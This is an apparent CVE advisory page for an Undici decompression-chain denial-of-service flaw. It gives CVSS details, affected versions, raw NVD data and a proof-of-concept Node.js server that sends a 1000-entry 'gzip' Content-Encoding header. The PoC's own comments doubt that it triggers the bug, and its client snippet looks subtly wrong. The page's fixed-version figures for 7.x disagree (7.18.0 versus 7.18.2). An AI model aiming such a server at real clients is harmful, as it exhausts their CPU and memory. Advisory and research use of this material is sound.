Security Vulnerability Report
CVE-2026-22036 CVSS 5.9 MEDIUM

CVE-2026-22036

Published: 2026-01-14 19:16:48
Last Modified: 2026-01-22 21:15:50

Description

Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded, and the default maxHeaderSize allows a malicious server to insert thousands of compression steps, leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:* - VULNERABLE
Undici < 6.23.0
Undici >= 7.0.0 AND < 7.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22036 PoC - HTTP server that answers every request with a Content-Encoding
// header listing many repeated codings. In Undici < 7.18.0 and < 6.23.0 the decompression
// chain was unbounded, so a client following such a header spent CPU and memory per step.
//
// Notes from a defender's perspective:
//  - Mitigation is upgrading Undici to 7.18.0 / 6.23.0 or later, where the chain is bounded.
//  - A Content-Encoding value with hundreds of repeated codings is not something a
//    well-behaved origin emits; it is a cheap thing to alert on at an egress proxy.
//  - The body sent below is plain 'X' bytes rather than real gzip output, so this script
//    reproduces the header shape; whether it drives the full nested-decompression path is
//    not established here, and it should not be relied on as a regression test.
const http = require('http');

const COMPRESSION_LAYERS = 1000; // entries in the Content-Encoding chain
const CHUNK_BYTES = 1024 * 100;  // 100KB per written chunk
const CHUNK_COUNT = 10;          // chunks written before the response ends
const LISTEN_PORT = 8443;

// Builds the header value "gzip, gzip, ..." with `layers` entries.
function buildEncodingHeader(layers) {
  return Array.from({ length: layers }, () => 'gzip').join(', ');
}

// Handles one request: oversized encoding chain in the headers, chunked 'X' body.
function handleRequest(req, res) {
  const headers = {
    'Content-Encoding': buildEncodingHeader(COMPRESSION_LAYERS),
    'Content-Type': 'text/plain',
    'Transfer-Encoding': 'chunked',
  };
  res.writeHead(200, headers);

  // Buffer.alloc with a fill argument is the same as alloc() followed by fill('X').
  const payload = Buffer.alloc(CHUNK_BYTES, 'X');
  let written = 0;
  while (written < CHUNK_COUNT) {
    res.write(payload);
    written += 1;
  }
  res.end();
}

const server = http.createServer(handleRequest);

server.listen(LISTEN_PORT, () => {
  console.log('Malicious server listening on port 8443');
  console.log('Waiting for Undici client to connect...');
});

// Client side (the victim connection), left commented out as in the original:
// const { Undici } = require('undici');
// const client = new Undici('http://localhost:8443');
// client.request({ path: '/', method: 'GET' }).catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22036", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:47.833", "lastModified": "2026-01-22T21:15:50.070", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0."}, {"lang": "es", "value": "Undici es un cliente HTTP/1.1 para Node.js. Antes de 7.18.0 y 6.23.0, el número de enlaces en la cadena de descompresión es ilimitado y el maxHeaderSize predeterminado permite a un servidor malicioso insertar miles de pasos de compresión, lo que lleva a un alto uso de CPU y una asignación excesiva de memoria. Esta vulnerabilidad está corregida en 7.18.0 y 6.23.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.23.0", "matchCriteriaId": "5233A98F-D94B-41A6-9D16-4E69159ABF37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.18.2", "matchCriteriaId": "EF11F080-1703-43FC-86C0-BF257C4A2540"}]}]}], "references": [{"url": "https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}